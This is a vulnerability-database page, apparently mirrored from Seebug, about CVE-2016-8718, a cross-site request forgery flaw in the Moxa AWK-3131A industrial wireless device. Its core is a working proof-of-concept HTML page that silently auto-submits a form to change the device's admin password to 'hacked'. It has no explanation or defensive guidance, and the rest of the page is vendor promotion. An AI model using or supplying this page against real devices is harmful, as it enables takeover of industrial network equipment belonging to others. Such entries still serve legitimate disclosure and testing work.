Lucene search
K

Moxa AWK-3131A Web Application Cross-Site Request Forgery Vulnerability(CVE-2016-8718)

🗓️ 20 Sep 2017 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 50 Views

Moxa AWK-3131A CSRF Vulnerability in Web Application Functionality

Related
Code

                                                <html>
    <body>
    <form action="http://<device IP>/forms/webSetUserChgPwd" method="POST">
      <input type="hidden" name="NowPasswd" value="root" />
      <input type="hidden" name="Passwd" value="hacked" />
      <input type="hidden" name="ConfPasswd" value="hacked" />
      <input type="hidden" name="Submit" value="Submit" />
      <input type="hidden" name="UserName" value="admin" />
      <input type="hidden" name="bkpath" value="&#47;Password&#46;asp" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
    </body>
</html>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation